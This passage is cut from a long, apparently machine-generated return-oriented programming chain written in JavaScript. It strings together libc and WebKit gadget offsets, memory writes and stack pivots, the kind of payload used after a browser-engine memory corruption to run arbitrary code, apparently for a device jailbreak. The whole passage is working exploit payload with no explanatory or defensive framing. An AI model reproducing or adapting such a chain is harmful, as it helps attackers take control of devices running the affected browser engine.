libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+287664, //L5524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+287632, //L5522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+287648, //L5523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5522: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5524: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287752, //L5526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5525: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5526: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+287808, //L5527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5527: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5529: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+287888, //L5531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5531: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+287992, //L5532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+288008, //L5533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5532: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5533: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+288096, //L5535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5535: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288152, //L5536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5536: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+288224, //L5539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5539: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288280, //L5540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5540: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+288368, //L5542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5542: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5544: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+288488, //L5547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288472, //L5545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5545: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5547: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288632, //L5550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288600, //L5548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+288616, //L5549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5548: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5549: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5550: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+288712, //L5551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5551: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5553: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+288832, //L5556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288816, //L5554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5554: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288944, //L5557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+288976, //L5559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+288960, //L5558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5557: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5558: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5559: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+289144, //L5562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+289112, //L5560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+289128, //L5561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5560: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5562: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+289224, //L5563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5565: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5567: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+289384, //L5570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289368, //L5568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5568: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5570: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+289544, //L5575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+289560, //L5576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+289496, //L5572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5572: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5573: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5574: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5576: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+289672, //L5577+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+289664, //L5577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5577: db([0, 0]); // 0x0 set_gadgets([ ropchain+289688, //L5577+24 ropchain+290640, //L5571 libc_base+764760, //pop rsi ropchain+289728, //L5578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5578: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5580: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+289848, //L5583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289832, //L5581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5581: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+289992, //L5586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289960, //L5584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+289976, //L5585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5584: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+290088, //L5588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5587: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5588: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5589: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+290192, //L5590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290208, //L5591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5590: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5591: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+290384, //L5593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290400, //L5594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+290368, //L5592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5592: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+290544, //L5597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290560, //L5598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+290512, //L5595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5595: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5596: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5597: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5598: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+290632, //L5599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5599: db([0, 0]); // 0x0 //L5571: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+290760, //L5602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290776, //L5603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+290744, //L5601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5601: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5602: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5603: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+290888, //L5605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290936, //L5608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+290904, //L5606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5605: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5606: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5607: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5608: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+291048, //L5609+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+291040, //L5609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5609: db([0, 0]); // 0x0 set_gadgets([ ropchain+291064, //L5609+24 ropchain+291080, //L5604 libc_base+782311, //pop rsp ropchain+279792, //L5328 //L5604: //L5610: //L5322: libc_base+764760, //pop rsi ropchain+291120, //L5611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5611: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5613: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+291240, //L5616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291224, //L5614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5614: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5616: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+291416, //L5619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+291432, //L5620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291384, //L5617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+291400, //L5618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5617: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5618: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5620: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+291528, //L5622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+291512, //L5621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5622: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+291608, //L5623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5623: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5625: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+291728, //L5628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291712, //L5626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5628: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+291904, //L5631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+291920, //L5632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291872, //L5629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+291888, //L5630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5629: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5630: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5631: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5632: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+292016, //L5634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+292000, //L5633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5634: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292096, //L5635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5637: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+292216, //L5640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292200, //L5638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5638: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5640: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+292392, //L5643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+292408, //L5644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292360, //L5641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+292376, //L5642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5641: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5643: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5644: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+292504, //L5646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+292488, //L5645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5645: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5646: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292584, //L5647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5647: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5649: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+292704, //L5652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292688, //L5650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5650: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5652: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+292848, //L5655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292816, //L5653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+292832, //L5654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5653: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5654: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5655: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292928, //L5656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5656: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5658: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+293048, //L5661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+293032, //L5659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5659: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5661: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+293208, //L5665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+293176, //L5663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+293192, //L5664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5662: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5664: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5665: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+293264, //L5667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5667: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+293392, //L5669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+293408, //L5670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293376, //L5668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5668: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5670: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+293568, //L5674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+293536, //L5672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293552, //L5673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5671: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5672: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5673: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5674: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+293624, //L5676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5676: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+293752, //L5678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+293768, //L5679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293736, //L5677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5677: db([0, 0]); // 0x0 